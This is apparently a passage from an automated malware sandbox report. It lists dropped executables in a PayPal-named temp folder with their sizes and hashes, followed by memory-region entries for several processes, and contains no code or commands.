                  4a2000a1a303a438c5c4cd157f5a8ddcd209da3f

                  SHA256

                  a75efc813f1b739e79ba3a2f5e33509adedb45c815fc361b6cd57d08c7bc5bf8

                  SHA512

                  461264fe627f9e1e0bd7e7577c79a236c8facedf9e2a3c6b456522301a7853a0788c2d87a7638d06eed6c47b4bdfb54a609c70b3ddd1e10bfad4b3ed8483e643

                • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe

                  Filesize

                  423KB

                  MD5

                  c32ca4acfcc635ec1ea6ed8a34df5fac

                  SHA1

                  f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                  SHA256

                  73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                  SHA512

                  6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe

                  Filesize

                  423KB

                  MD5

                  c32ca4acfcc635ec1ea6ed8a34df5fac

                  SHA1

                  f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                  SHA256

                  73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                  SHA512

                  6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe

                  Filesize

                  442KB

                  MD5

                  04029e121a0cfa5991749937dd22a1d9

                  SHA1

                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                  SHA256

                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                  SHA512

                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe

                  Filesize

                  442KB

                  MD5

                  04029e121a0cfa5991749937dd22a1d9

                  SHA1

                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                  SHA256

                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                  SHA512

                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ylbw2aym.o0x.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • memory/1416-396-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-404-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-2690-0x0000024542010000-0x0000024542020000-memory.dmp

                  Filesize

                  64KB

                • memory/1416-2184-0x0000024542010000-0x0000024542020000-memory.dmp

                  Filesize

                  64KB

                • memory/1416-410-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-407-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-402-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-400-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-398-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-394-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-392-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-390-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-388-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-386-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-384-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-382-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-380-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-378-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-376-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-374-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-372-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-370-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-368-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-366-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-364-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-362-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-342-0x0000000140000000-0x00000001400B2000-memory.dmp

                  Filesize

                  712KB

                • memory/1416-360-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-346-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-347-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-349-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-352-0x0000024542010000-0x0000024542020000-memory.dmp

                  Filesize

                  64KB

                • memory/1416-351-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-354-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-356-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/1416-358-0x00000245420B0000-0x00000245421A9000-memory.dmp

                  Filesize

                  996KB

                • memory/2720-241-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/2720-168-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/2720-169-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/2720-170-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/2720-167-0x000002A47B2D0000-0x000002A47B2F2000-memory.dmp

                  Filesize

                  136KB

                • memory/2720-233-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/2720-234-0x000002A478F70000-0x000002A478F80000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-173-0x0000000006C10000-0x0000000006C2A000-memory.dmp

                  Filesize

                  104KB

                • memory/4124-142-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-166-0x00000000065F0000-0x000000000660E000-memory.dmp

                  Filesize

                  120KB

                • memory/4124-146-0x00000000061D0000-0x0000000006236000-memory.dmp

                  Filesize

                  408KB

                • memory/4124-242-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-225-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-224-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-140-0x00000000031F0000-0x0000000003226000-memory.dmp

                  Filesize

                  216KB

                • memory/4124-145-0x0000000005FF0000-0x0000000006056000-memory.dmp

                  Filesize

                  408KB

                • memory/4124-171-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-144-0x0000000003290000-0x00000000032A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4124-143-0x0000000005710000-0x0000000005732000-memory.dmp

                  Filesize

                  136KB

                • memory/4124-172-0x0000000008000000-0x000000000867A000-memory.dmp

                  Filesize

                  6.5MB

                • memory/4124-141-0x0000000005950000-0x0000000005F78000-memory.dmp

                  Filesize

                  6.2MB

                • memory/4468-184-0x000001DDE0CC0000-0x000001DDE0CD0000-memory.dmp

                  Filesize

                  64KB

                • memory/4468-183-0x000001DDE0CC0000-0x000001DDE0CD0000-memory.dmp

                  Filesize

                  64KB

                • memory/4468-185-0x000001DDE0CC0000-0x000001DDE0CD0000-memory.dmp

                  Filesize

                  64KB

                • memory/4468-270-0x000001DDE0CC0000-0x000001DDE0CD0000-memory.dmp

                  Filesize

                  64KB

                • memory/4792-329-0x0000000004D90000-0x0000000004DA0000-memory.dmp

                  Filesize

                  64KB

                • memory/4792-336-0x0000000004D90000-0x0000000004DA0000-memory.dmp

                  Filesize

                  64KB

                • memory/4792-195-0x0000000004D90000-0x0000000004DA0000-memory.dmp

                  Filesize

                  64KB

                • memory/4792-196-0x0000000004D90000-0x0000000004DA0000-memory.dmp

                  Filesize

                  64KB

                • memory/4880-2695-0x0000000000400000-0x0000000000446000-memory.dmp

                  Filesize

                  280KB

                • memory/4880-2696-0x0000000005720000-0x0000000005D38000-memory.dmp

                  Filesize

                  6.1MB

                • memory/4880-2697-0x0000000005130000-0x0000000005142000-memory.dmp

                  Filesize

                  72KB

                • memory/4880-2698-0x0000000005260000-0x000000000536A000-memory.dmp

                  Filesize

                  1.0MB

                • memory/4880-2699-0x00000000051D0000-0x000000000520C000-memory.dmp

                  Filesize

                  240KB

                • memory/4880-2707-0x0000000005180000-0x0000000005190000-memory.dmp

                  Filesize

                  64KB

                • memory/4880-2708-0x0000000006040000-0x00000000060D2000-memory.dmp

                  Filesize

                  584KB

                • memory/4880-2709-0x0000000006690000-0x0000000006C34000-memory.dmp

                  Filesize

                  5.6MB

                • memory/4880-2752-0x0000000006CC0000-0x0000000006D36000-memory.dmp

                  Filesize

                  472KB

                • memory/4880-2753-0x0000000006F10000-0x00000000070D2000-memory.dmp

                  Filesize

                  1.8MB

                • memory/4880-2754-0x0000000007D60000-0x000000000828C000-memory.dmp

                  Filesize

                  5.2MB

                • memory/4880-2755-0x0000000006DA0000-0x0000000006DBE000-memory.dmp

                  Filesize

                  120KB

                • memory/4880-2763-0x0000000005180000-0x0000000005190000-memory.dmp

                  Filesize

                  64KB